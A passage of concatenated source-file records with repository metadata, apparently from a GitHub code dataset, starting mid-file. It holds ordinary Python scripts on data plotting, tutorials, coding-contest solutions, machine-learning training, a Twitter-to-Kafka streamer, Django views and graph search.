1))\n for origin in origin_airports:\n origin_index = airport_indexes[origin]\n city_data = data.sel(Origin=origin).dropna(dim=\"Destination\", how=\"all\")\n\n for row in city_data.Passengers:\n count = int(row.values)\n destination_index = airport_indexes[str(row.coords[\"Destination\"].values)]\n\n # Set both sides of the array to this value\n heatmap_data[origin_index, destination_index] = count\n heatmap_data[destination_index, origin_index] = count\n\n # Plot the data\n fig, ax = plt.subplots()\n plt.rcParams.update({\"font.size\": 14})\n im = ax.imshow(heatmap_data, cmap=\"plasma\")\n\n # Adjust ticks\n ax.set_xticks(np.arange(len(all_airports)))\n ax.set_yticks(np.arange(len(all_airports)))\n ax.set_xticklabels(all_airports)\n ax.set_yticklabels(all_airports)\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n # Adjust colorbar\n cbar = ax.figure.colorbar(im, ax=ax)\n cbar.ax.set_ylabel(\"Total Traffic\")\n\n ax.set_title(\"Domestic Traffic - December 2019\")\n fig.tight_layout()\n plt.show()\n","repo_name":"rafraser/COSC3000","sub_path":"Visualization/processing/chart_domestic_heatmap.py","file_name":"chart_domestic_heatmap.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31117397044","text":"'''\nOverloading: Have Same method name but arguments or type of\narguments are different\n\nexample: + can be used in int, float, string...etc\n\nOperator remains same but operands will change\n\n5+6\n 5 & 6 } Operands\n + } Operator\n\n int.__add__(5,6)\n'''\n\nclass Students:\n def __init__(self, m1, m2):\n self.m1 = m1\n self.m2 = m2\n\n # \"Overloading Operators\"\n def __add__(self, other): # stu1,stu2\n m1 = self.m1 + other.m1\n m2 = self.m2 + other.m2\n s3 = Students(m1,m2)\n\n return s3\n\n def __sub__(self, other):\n m1 = self.m1 - other.m1\n m2 = self.m2 - other.m2\n s4 = Students(m1,m2)\n\n return s4\n\n def __gt__(self, other):\n s1 = self.m1 + self.m2\n s2 = other.m1 + other.m2\n if s1 > s2:\n return True\n else:\n return False\n\n def __str__(self):\n return f\"{self.m1}, {self.m2}\"\n\n'''\nIf you add 2 different operands we have to overload that operator\n'''\nstu1 = Students(60,62)\nstu2 = Students(55,60)\n\nvalue1 = stu1 + stu2\n\n'''\n Stu1 | Stu2\n 50 | 62\n 45 | 60\n _____|_____\n 95 122\n'''\nprint(value1.m1)\nprint(value1.m2)\n\nprint('-'*10)\n\nvalue2 = stu1-stu2\n\n'''\n Stu1 | Stu2\n 50 | 62\n 45 | 60\n _____|_____\n 5 2\n'''\nprint(value2.m1)\nprint(value2.m2)\n\nprint('-'*10)\n\nif stu1 > stu2:\n print(\"stu1 wins!!!\")\nelse:\n print(\"stu2 wins!!!\")\n\n\n'''\nIf you want to perform any operation on the objects \nwhich are user defined we have to use operator overloading\n'''\nprint(\"-\"*10)\nprint(stu1)\nprint(stu2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vegadhardik7/Python-DSA-MySQL-Dynamic-Programming-Advance-Concepts","sub_path":"Dynamic Programming/019 Operator Overloading.py","file_name":"019 Operator Overloading.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23553149381","text":"def tidy(n):\r\n rn = list(map(int, n[::-1]))\r\n l = 0\r\n for i in range(len(rn[:-1])):\r\n if (rn[i] < rn[i+1]):\r\n l = i + 1\r\n rn[i+1] -= 1\r\n\r\n a = rn[::-1]\r\n b = a[:-l or None]\r\n b.extend(l * [9])\r\n return ''.join(str(x) for x in b).lstrip('0')\r\n\r\nf = open('B-small-attempt0.in', 'r')\r\no = open('output', 'w')\r\nt = f.readline()\r\nstrf = \"Case #{case}: {tn}\"\r\n\r\nc = 0\r\nfor n in f:\r\n c += 1\r\n tidy_n = tidy(n.strip())\r\n print('old: ', n.strip(), ' new: ', tidy_n)\r\n o.write(strf.format(case = c, tn = tidy_n))\r\n if( c < int(t)):\r\n o.write(\"\\n\")\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1617.py","file_name":"1617.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33727929059","text":"\n\ndef magic(A,i):\n if len(A) == i : \n print(\"not there\")\n return\n if A[i] == i : \n print(\"magic is %s\" %(str(i)))\n return\n return magic (A,i+1)\n\n\nA = [-40,-20,-1,1,2,3,5,7,9,12,13]\n\nmagic(A,0)\n","repo_name":"rampedro/Cracking-the-coding-interview-leetcode","sub_path":"magic-index.py","file_name":"magic-index.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22759897911","text":"import os\nimport random as python_random\nimport sys\n\n''' TF_CPP_MIN_LOG_LEVEL\n0 = all messages are logged (default behavior)\n1 = INFO messages are not printed\n2 = INFO and WARNING messages are not printed\n3 = INFO, WARNING, and ERROR messages are not printed\n'''\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'\nos.environ['PYTHONHASHSEED'] = '0'\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import EarlyStopping, TensorBoard\nfrom tensorflow.keras.metrics import RootMeanSquaredError\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.optimizers.schedules import ExponentialDecay\n\nfrom cfgs import cfg\nfrom models.unet_default import unet_default as Model\nfrom utils.callback import SaveWeightCallback, TimingCallback\nfrom utils.dataset import ImageDataSet\nfrom utils.helper import output_init, plot_train_history, print_cfg\nfrom utils.image import dataset_plot_batch, plot_two_images_array\nfrom utils.preprocessing import train_preprocessing\n\nnp.random.seed(cfg.SEED)\npython_random.seed(cfg.SEED)\ntf.random.set_seed(cfg.SEED)\n\nos.system('nvcc -V')\ngpus = tf.config.list_physical_devices('GPU')\ntf.config.set_visible_devices(gpus[0], 'GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\n\nif __name__ == \"__main__\":\n fit_verbose = 1\n steps_per_execution = 1\n\n if len(sys.argv) > 1 and sys.argv[1] == \"--prod\":\n fit_verbose = 2\n steps_per_execution = 10000\n\n print_cfg(cfg)\n output_init(cfg)\n\n train_X_obj = ImageDataSet(\"RGB \", input_path=cfg.TRAIN_RGB_PATH, save_image_path=cfg.SAVE_IMAGE_PATH.joinpath(\"train/input\"))\n train_Y_obj = ImageDataSet(\"NDVI\", input_path=cfg.TRAIN_NDVI_PATH, save_image_path=cfg.SAVE_IMAGE_PATH.joinpath(\"train/input\"))\n train_X_obj = train_X_obj.load_data(devided_by_255=False, expand_dims=False).crop(cfg.TRAIN_CROP_DELTA)\n train_Y_obj = train_Y_obj.load_data(devided_by_255=False, expand_dims=False).crop(cfg.TRAIN_CROP_DELTA)\n table = ImageDataSet.generate_resample_table(train_X_obj.num, cfg.TRAIN_RESAMPLE_MULTIPLE_FACTOR, (train_X_obj.height, train_X_obj.width), cfg.TRAIN_RESAMPLE_DIM)\n train_X = train_X_obj.resample(table, cfg.TRAIN_RESAMPLE_DIM).downscale(cfg.TRAIN_DOWNSCALE_FACTOR).get_image_array()\n train_Y = train_Y_obj.resample(table, cfg.TRAIN_RESAMPLE_DIM).downscale(cfg.TRAIN_DOWNSCALE_FACTOR).get_image_array()\n print(f\"RGB array shape: {train_X.shape}\")\n print(f\"NDVI array shape: {train_Y.shape}\")\n\n plot_two_images_array(train_X, train_Y, 'Train - RGB, NDVI', cfg.SAVE_FIGURE_PATH)\n\n batch_size = cfg.TRAIN_BATCH_SIZE\n val_split = cfg.VAL_SPLIT\n steps_per_epoch = int(np.round(train_X.shape[0] / batch_size * (1 - val_split)))\n validation_steps = int(np.round(train_X.shape[0] / batch_size * val_split))\n\n lr_schedule = ExponentialDecay(**cfg.LEARNING_RATE_ARGS)\n\n early_stop_callback = EarlyStopping(**cfg.EARLY_STOP_ARGS)\n save_weight_callback = SaveWeightCallback(save_weight_path=cfg.SAVE_WEIGHT_PATH)\n timing_callback = TimingCallback(epochs=cfg.EPOCHS)\n tensorboard_callback = TensorBoard(**cfg.TENSORBOARD_ARGS)\n callbacks = [early_stop_callback, save_weight_callback, timing_callback, tensorboard_callback]\n\n model = Model(model_name=cfg.MODEL_NAME, input_dim=train_X.shape[1:])\n adam = Adam(learning_rate=lr_schedule)\n model.compile(optimizer=adam, loss=cfg.MODEL_LOSS, metrics=RootMeanSquaredError(), steps_per_execution=steps_per_execution)\n 
model.summary()\n\n train_Y = train_Y_obj.norm_standard().get_image_array()\n train_ds, validation_ds = train_preprocessing(train_X, train_Y, batch_size=batch_size, cfg=cfg)\n\n # dataset_plot_batch(train_ds, 10, \"train\", cfg.SAVE_FIGURE_PATH)\n # dataset_plot_batch(validation_ds, 10, \"val\", cfg.SAVE_FIGURE_PATH)\n\n train_history = model.fit(\n train_ds,\n epochs=cfg.EPOCHS,\n steps_per_epoch=steps_per_epoch,\n validation_data=validation_ds,\n validation_steps=validation_steps,\n callbacks=callbacks,\n verbose=fit_verbose,\n )\n\n model.save(cfg.SAVE_MODEL_PATH.joinpath(\"trained_model.h5\"))\n plot_train_history(train_history, 'loss', 'val_loss', save_figure_path=cfg.SAVE_FIGURE_PATH)\n\n print(f\"Average epoch time: {np.mean(timing_callback.times):.2f}s\")\n","repo_name":"clearholder2001/Vegetable-Indices-Neural-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"38536220609","text":"\"\"\"\nScript for calibrating factors using original Rush Hour puzzles\n\"\"\"\n\ndata = []\nwith open(\"originalBoards_limited_scores\") as read:\n for line in read:\n els = line.split(\", \")\n data.append((int(els[0]), float(els[1]), float(els[2]), int(els[3].strip())))\n\ndef getscore(item):\n return item[1]\n\ndef evaluate(l, print=False):\n l.sort(key=getscore)\n\n diff = 0\n for num in range(len(l)):\n diff += abs(l[num][0] - (num+1))\n return diff, l\n\nlowest = float(\"inf\")\nli = 0\nlj = 0\nlk = 0\nthing = None\nfor i in range(0, 100, 1):\n for j in range(0, 100, 1):\n for k in range(0, 100, 1):\n intermed = []\n for item in data:\n id, deps, var, length = item\n if deps == 10 and var == 10 and length == 0:\n continue\n score = i*deps+j*var+k*length\n intermed.append((id, score))\n diff, order = evaluate(intermed)\n if diff int:\n result = [amount+1]*(amount+1)\n result[0] = 0\n for i in range(1, amount+1):\n for coin in coins:\n if i < coin:\n continue\n result[i] = min(result[i], result[i-coin]+1)\n if result[amount] == amount+1:\n return -1\n return result[amount]\n\n\n","repo_name":"chenxino/LeetCode_Notes","sub_path":"labuladong/322.py","file_name":"322.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23455798281","text":"fo = open('A-small-attempt1.in', 'r')\n\ncount = 0\nsumm = 0\nindex = 1\nnext(fo)\nfor line in fo:\n\tfor i in range(2, len(line)-1):\n\t\tl = int(i)-2\n\t\tt = int(line[i])\n\t\tif i == 2:\n\t\t\tsumm = t\n\t\telse:\n\t\t\tif summ+count < l and t != 0:\n\t\t\t\tcount = l-summ+count\n\t\t\t\tsumm = l-summ+count+t\n\t\t\t\t#print('true')\n\t\t\t\t#print(summ, count, l)\n\t\t\telse:\n\t\t\t\tsumm = summ + t\n\t\t\t\t#print('false')\n\t\t\t\t#print(summ, count, l)\n\t\t\n\tprint('Case #' + str(index) + ': ' + str(count))\n\tcount = 0\n\tsumm = 0\n\tindex +=1\n\nfo.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3693.py","file_name":"3693.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36034447978","text":"from __future__ import division\nimport numpy as np\nimport scipy as sp\nfrom .resample_clone import resample as resample_func\n\n__authors__ = \"Alex Bujan\"\n\n__all__ = ['resample']\n\n\ndef resample(X, new_freq, old_freq, kind=1, axis=-1, same_sign=False):\n \"\"\"\n Resamples the ECoG signal from the original\n sampling frequency to a new frequency.\n\n Parameters\n ----------\n X : array\n Input data, dimensions (n_channels, ..., n_timePoints)\n new_freq : float\n New sampling frequency\n old_freq : float\n Original sampling frequency\n axis : int (optional)\n Axis along which to resample the data\n\n Returns\n -------\n Xds : array\n Downsampled data, dimensions (n_channels, ..., n_timePoints_new)\n \"\"\"\n ratio = float(old_freq) / new_freq\n if np.allclose(ratio, int(ratio)) and same_sign:\n ratio = int(ratio)\n if (ratio % 2) == 0:\n med = ratio + 1\n else:\n med = ratio\n meds = [1] * X.ndim\n meds[axis % X.ndim] = med\n slices = [slice(None)] * X.ndim\n slices[axis % X.ndim] = slice(None, None, ratio)\n Xds = sp.signal.medfilt(X, meds)[slices]\n else:\n time = X.shape[axis]\n new_time = int(np.ceil(time * new_freq / old_freq))\n if kind == 0:\n ratio = int(ratio)\n if (ratio % 2) == 0:\n med = ratio + 1\n else:\n med = ratio\n meds = [1] * X.ndim\n meds[axis % X.ndim] = med\n Xf = sp.signal.medfilt(X, meds)\n f = sp.interpolate.interp1d(np.linspace(0, 1, time), Xf, axis=axis)\n Xds = f(np.linspace(0, 1, new_time))\n else:\n Xds = resample_func(X, new_time, axis=axis)\n\n return Xds\n","repo_name":"BouchardLab/process_ecog","sub_path":"ecog/signal_processing/resample.py","file_name":"resample.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"17615568873","text":"import logging\nlog = logging.getLogger(\"zen.migrate\")\n\nimport Migrate\nimport servicemigration as sm\nsm.require(\"1.0.0\")\n\n\nclass RetryZopeHealthCheck(Migrate.Step):\n \"Change 'answering' healthcheck to retry a few times on failture\"\n\n version = Migrate.Version(108, 0, 0)\n\n def cutover(self, dmd):\n try:\n ctx = sm.ServiceContext()\n except sm.ServiceMigrationError:\n log.info(\"Couldn't generate service context, skipping.\")\n return\n\n zope_services = filter(lambda s: s.name == 'Zope', ctx.services)\n\n # Update all of the 'answering' healthchecks\n for service in zope_services:\n answeringHealthChecks = filter(lambda healthCheck: healthCheck.name == \"answering\", service.healthChecks)\n for check in answeringHealthChecks:\n check.script = \"curl -o /dev/null --retry 3 --max-time 2 -w '%{redirect_url}' -s http://localhost:9080/zport/dmd | grep -q acl_users\"\n check.interval = 15.0\n log.info(\"Updated 'answering' healthcheck.\")\n\n ctx.commit()\n\nRetryZopeHealthCheck()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/retryZopeHealthCheck.py","file_name":"retryZopeHealthCheck.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
+{"seq_id":"13348526724","text":"import sys\nsys.path.insert(1,\"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\ndef fiftycat_gbm():\n # Training set has only 45 categories cat1 through cat45\n train = h2o.import_file(path=pyunit_utils.locate(\"smalldata/gbm_test/50_cattest_train.csv\"))\n train[\"y\"] = train[\"y\"].asfactor()\n\n # Train H2O GBM Model:\n\n model = H2OGradientBoostingEstimator(distribution=\"bernoulli\",\n ntrees=10,\n max_depth=5,\n nbins=20)\n model.train(x=[\"x1\",\"x2\"],y=\"y\", training_frame=train)\n model.show()\n\n # Test dataset has all 50 categories cat1 through cat50\n test = h2o.import_file(path=pyunit_utils.locate(\"smalldata/gbm_test/50_cattest_test.csv\"))\n\n\n # Predict on test dataset with GBM model:\n predictions = model.predict(test)\n predictions.show()\n\n # Get the confusion matrix and AUC\n performance = model.model_performance(test)\n test_cm = performance.confusion_matrix()\n test_auc = performance.auc()\n\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(fiftycat_gbm)\nelse:\n fiftycat_gbm()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/gbm/pyunit_fiftycat_gbm.py","file_name":"pyunit_fiftycat_gbm.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"}
+{"seq_id":"32561792474","text":"# coding: utf-8\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport pickle\nimport sys\nimport random\n\nfrom MultiLayerNet.util import shuffle_dataset\nfrom MultiLayerNet.multi_layer_net import MultiLayerNet\nfrom MultiLayerNet.multi_layer_net_extend import MultiLayerNetExtend\nfrom MultiLayerNet.trainer import Trainer\n\nfrom train_method import *\n\ndef __train(lr, weight_decay,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test,\n epocs=50,# epocs=50\n Optimizer=\"sgd\",\n hidden_size_list=[100, 100, 100, 100, 100]):\n \"\"\"\n network = MultiLayerNet(input_size=x.shape[1],\n hidden_size_list=[100, 100, 100, 100, 100],\n output_size=2,\n weight_decay_lambda=weight_decay)\n \"\"\"\n network = MultiLayerNetExtend(input_size=x.shape[1],\n hidden_size_list=hidden_size_list,\n output_size=1, # 分類(判別)の場合は2\n weight_decay_lambda=weight_decay,\n use_dropout=True,\n dropout_ration=0.5,\n use_batchnorm=True)\n\n # レイアーの確認\n #network.layer_cheack()\n\n batch_size = int(x_train.shape[0]/100)\n print(\"batch_size: \"+str(batch_size))\n print(\"Optimizer: {}\".format(Optimizer))\n\n trainer = Trainer(network, x_train, t_train, x_val, t_val,\n epochs=epocs,\n mini_batch_size=batch_size, # 100\n optimizer=Optimizer, # sgd\n optimizer_param={\"lr\": lr},\n verbose=False) # verbose...loss, acc, etc を表示する\n\n trainer.train()\n\n # パラメーターの保存\n #network.save_params(\"params.pkl\")\n #network.load_params(\"params.pkl\")\n\n Test_data_acc = network.accuracy(x_test, t_test, regression=True) # 正解率\n # Test_data_loss = network.loss(x_test, t_test, real_mean=True) # 変化率の分散\n\n # ...return...\n # ...trainer.test_acc_list...val_acc_list\n # ...trainer.train_acc_list...train_acc_list\n # ...Test_data_acc...test_acc\n # ...network...network\n\n return trainer.test_acc_list, trainer.train_acc_list, Test_data_acc, network\n\ndef main():\n x = pd.read_csv(\"get_make_data/x_t_data/x.csv\")\n t = pd.read_csv(\"get_make_data/x_t_data/t.csv\")\n\n x = np.array(x)\n t = np.array(t)\n #t = t.astype(np.uint8) #分類(判別)のときは必要\n\n x, t = shuffle_dataset(x, t)\n m = 4 # データの1/mを使用\n x_len, t_len = int(len(x)/m), int(len(t)/m)\n x, t = x[:x_len], t[:t_len]\n\n validation_rate = 0.20 # ハイパーパラメータ検証データは20%\n train_rate = 0.60 # 学習データは60%\n test_rate = 1 - (validation_rate + train_rate)\n\n validation_num = int(x.shape[0] * validation_rate)\n train_num = int(x.shape[0] * train_rate)\n\n x_val, t_val = x[:validation_num], t[:validation_num]\n x_train, t_train = x[validation_num:validation_num + train_num], t[validation_num:validation_num + train_num]\n x_test, t_test = x[validation_num + train_num:], t[validation_num + train_num:]\n\n #---#\n # ハイパーパラメータを検証する回数\n optimization_trial = 10 # 100 \n \"\"\"\n Optimizer = \"Adam\" # 最適化法 {'sgd':SGD, 'momentum':Momentum, 'nesterov':Nesterov,\n # 'adagrad':AdaGrad, 'rmsprpo':RMSprop, 'adam':Adam}\n\n best_params_network = hyper_parameter_verification(optimization_trial, Optimizer,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test) # hyper parameterの検証\n # ノードの数と最適化法を固定してハイパーパラメータ(leaning rate, weight decay)の検証を行う\n \"\"\"\n \"\"\"\n Optimizer_dict = {\"sgd\":\"SGD\", \"adam\":\"Adam\"}\n optimizer_verification(Optimizer_dict, optimization_trial,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test)\n # ハイパーパラメーター(learning rate, weight decay)とノードの数 を固定して optimizer(最適化法)毎に評価する\n \"\"\"\n \"\"\"\n unit_verification(x, x_val, x_train, x_test,\n t, t_val, t_train, t_test)\n \"\"\"\n \"\"\"\n grid_search(x, x_val, x_train, x_test,\n t, 
t_val, t_train, t_test)\n \"\"\"\n print(\"bayesian_optimizer \\n\")\n bayesian_optimizer()\n sys.exit()\n\n # best parameter の save\n best_params_network[\"network\"].save_params(\"best_Params_{}.pkl\".fromat(Optimizer))\n\n # hyper parameter の save\n with open(\"MultiLayerNet/params/best_HyperParams_{}.pkl\".fromat(Optimizer), \"wb\") as f:\n pickle.dump(best_params_network, f)\n\n return\n\n\nif __name__ == '__main__':\n print(\"main_train_main\")\n print(\"\\n\")\n main()\n","repo_name":"yonedahayato/stock_MultiLayerNet","sub_path":"main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36054574618","text":"from tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom kafka import KafkaProducer\nfrom dotenv import load_dotenv\nfrom textblob import TextBlob\nimport os\nimport json\nimport re\n\nload_dotenv()\n\naccess_token = os.environ['TWITTER_ACCESS_TOKEN']\naccess_token_secret = os.environ['TWITTER_ACCESS_TOKEN_SECRET']\nconsumer_key = os.environ['TWITTER_CONSUMER_KEY']\nconsumer_secret = os.environ['TWITTER_CONSUMER_SECRET']\n\ntopic_name = os.environ['TOPIC_NAME']\nkafka_server = os.environ['KAFKA_SERVER']\n\nproducer = KafkaProducer(bootstrap_servers=kafka_server,\n value_serializer=lambda x: json.dumps(x).encode('utf-8'))\n\n\nclass TwitterAuth:\n\n def authenticate(self):\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n return auth\n\n\nclass TwitterStreamer:\n\n def __init__(self):\n self.twitterAuth = TwitterAuth()\n\n def stream_tweets(self):\n while True:\n listener = MyListener()\n auth = self.twitterAuth.authenticate()\n stream = Stream(auth, listener)\n stream.filter(languages=['en'], track=['Trump'])\n\n\nclass MyListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n\n def on_status(self, status):\n if status.retweeted:\n return True\n tweet = self.parse_tweet(status)\n producer.send(topic_name, tweet)\n return True\n\n def parse_tweet(self, status):\n text = self.de_emojify(status.text)\n sentiment = TextBlob(text).sentiment\n\n tweet = {\n \"created_at\": str(status.created_at),\n \"text\": text,\n \"hashtags\": self.extract_hashtags(text),\n \"polarity\": sentiment.polarity,\n \"subjectivity\": sentiment.subjectivity,\n \"user_id\": status.user.id,\n \"user_name\": status.user.name,\n \"user_location\": self.de_emojify(status.user.location),\n \"user_description\": self.de_emojify(status.user.location),\n \"user_verified\": status.user.verified,\n \"user_followers_count\": status.user.followers_count,\n \"user_statuses_count\": status.user.statuses_count,\n \"user_created_at\": str(status.user.created_at),\n \"user_default_profile_image\": status.user.default_profile_image,\n \"latitude\": status.coordinates['coordinates'][0] if status.coordinates else None,\n \"longitude\": status.coordinates['coordinates'][1] if status.coordinates else None,\n }\n return tweet\n\n @staticmethod\n def clean_tweet(tweet):\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n @staticmethod\n def de_emojify(text):\n return text.encode('ascii', 'ignore').decode('ascii') if text else None\n\n @staticmethod\n def extract_hashtags(text):\n return re.findall(r\"#(\\w+)\", text)\n\n\nif __name__ == '__main__':\n streamer = TwitterStreamer()\n streamer.stream_tweets()\n","repo_name":"plaftsis/donald-track","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28380811553","text":"from rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .serializers import Serializer, PutSerializer\nfrom core.decorators import map_exceptions, validate_body\nfrom custom_service.errors import ERROR_POST_NOT_FOUND\nfrom custom_service.exceptions import PostNotFound\nfrom .crud import Handler\nfrom custom_service.models.ModelTechwiz import TimeTable, RevisionClass\nfrom utils.base_views import PaginationApiView\n\n\nclass GetListView(PaginationApiView):\n permission_classes = (AllowAny,) # IsAuthenticated\n\n def get(self, request, revision_id):\n \"\"\"\n\n get time table by revision id\n\n \"\"\"\n all = TimeTable.objects.filter(revision_class_id=revision_id).all()\n page_info, paginated_data = self.get_paginated(all)\n serializer = Serializer(paginated_data, many=True).data\n data = {\n 'data': serializer,\n 'page_info': page_info\n }\n return Response(data, status=200)\n\n @validate_body(PutSerializer)\n def post(self, request, data):\n temp = Handler().create(data)\n serializer = Serializer(temp).data\n data = {\n 'data': serializer\n }\n return Response(data, status=200)\n\nclass DetailView(APIView):\n permission_classes = (AllowAny,)\n serializer_class = Serializer\n handler_class = Handler\n @map_exceptions(\n {\n PostNotFound: ERROR_POST_NOT_FOUND,\n }\n )\n def get(self, request, id):\n temp = self.handler_class().get(id)\n serializer = self.serializer_class(temp).data\n data = {\n 'data': serializer\n }\n return Response(data, status=200)\n\n @map_exceptions(\n {\n PostNotFound: ERROR_POST_NOT_FOUND,\n }\n )\n def delete(self, request, **kwargs):\n id = kwargs.get(\"id\")\n self.handler_class().delete(id)\n return Response(\n {\n 'payload': None\n },\n status=204\n )\n def put(self, request, id):\n data = request.data\n temp = Handler().update(id, data)\n serializer = Serializer(temp).data\n data = {\n 'payload': serializer\n }\n return Response(data, status=200)\n\n","repo_name":"giaphiendev/base_django","sub_path":"django_app/api/time_table/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8639579437","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Task(models.Model):\n # create one-to-many relationship -> one user can have many items\n # on_delete what do we do with a task if the user gets deleted -> we will delete the task as well\n # null=True in theory in the database this field could be empty=Null\n # whenever we submit a form we want to allow that value to be blank\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n # CharField is usually used for Headline, Name or simple values\n # TextField is used to create a box to write a message\n title = models.CharField(max_length=200)\n description = models.TextField(null=True, blank=True)\n # default=False -> because when an item is first created we do not want ti to be True/Completed already\n complete = models.BooleanField(default=False)\n # auto_now_add it takes a snapshot of the time when the task was created and put it in date time\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n # set the default value to title\n return self.title\n\n class Meta:\n # set the default ordering by task complete\n # every complete status should be sent to the bottom of the list because they are done\n ordering = ['complete']","repo_name":"stefaniavlad/Django_ToDoApp","sub_path":"todo_list/base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19081398292","text":"'''\n문제\n그래프를 DFS로 탐색한 결과와 BFS로 탐색한 결과를 출력하는 프로그램을 작성하시오. \n단, 방문할 수 있는 정점이 여러 개인 경우에는 정점 번호가 작은 것을 먼저 방문하고, \n더 이상 방문할 수 있는 점이 없는 경우 종료한다. 정점 번호는 1번부터 N번까지이다.\n\n입력\n첫째 줄에 정점의 개수 N(1 ≤ N ≤ 1,000), 간선의 개수 M(1 ≤ M ≤ 10,000),\n 탐색을 시작할 정점의 번호 V가 주어진다. 다음 M개의 줄에는 간선이 연결하는 두 정점의 번호가 주어진다. \n 어떤 두 정점 사이에 여러 개의 간선이 있을 수 있다. 입력으로 주어지는 간선은 양방향이다.\n\n출력\n첫째 줄에 DFS를 수행한 결과를, 그 다음 줄에는 BFS를 수행한 결과를 출력한다. \nV부터 방문된 점을 순서대로 출력하면 된다.\n\n예제 입력 1 \n4 5 1\n1 2\n1 3\n1 4\n2 4\n3 4\n예제 출력 1 \n1 2 4 3\n1 2 3 4\n\n\n'''\n\nimport sys\nfrom queue import deque\n\nN, M, V = map(int, sys.stdin.readline().split())\n\nd = [ [] for i in range(N+1) ]\nfor i in range(M):\n a, b = map(int, sys.stdin.readline().split())\n d[a].append(b)\n d[b].append(a)\n\nfor i in range(len(d)):\n d[i] = sorted(d[i]) # 작은 수부터 오름 차순으로 탐색하려고 정렬해둠. <- 여기에서 중복을 미리 제거해두는 것도 괜찮긴 하겠다.\n\nvis = [False]*(N+1)\n\ndfs_list = []\n\ndef dfs(d, pos, vis):\n if vis[pos]:\n return\n vis[pos] = True\n dfs_list.append(pos)\n for i in range(len(d[pos])):\n dfs(d, d[pos][i], vis) # 위에서 sorted이므로 오름차순으로 출력됌\n\n\ndfs(d, V, vis)\n\n\n\n\n# BFS start\ndef queue_push(q, v):\n q.append(v)\ndef queue_pop(q):\n return q.popleft()\n\nq = deque()\n\nqueue_push(q, V)\n\nvis_q = [False]*(N+1)\nbfs_list = []\n\nvis_q[V] = True\n\nwhile len(q) != 0:\n front = queue_pop(q)\n bfs_list.append(front)\n for i in range(len(d[front])):\n if vis_q[d[front][i]]:\n continue\n vis_q[d[front][i]] = True\n queue_push(q, d[front][i])\n\n\nfor i in range(len(dfs_list)):\n print(dfs_list[i], end=' ')\nprint()\nfor i in range(len(bfs_list)):\n print(bfs_list[i], end=' ')\n# print('end') \n \n# print(str(dfs_list))\n# 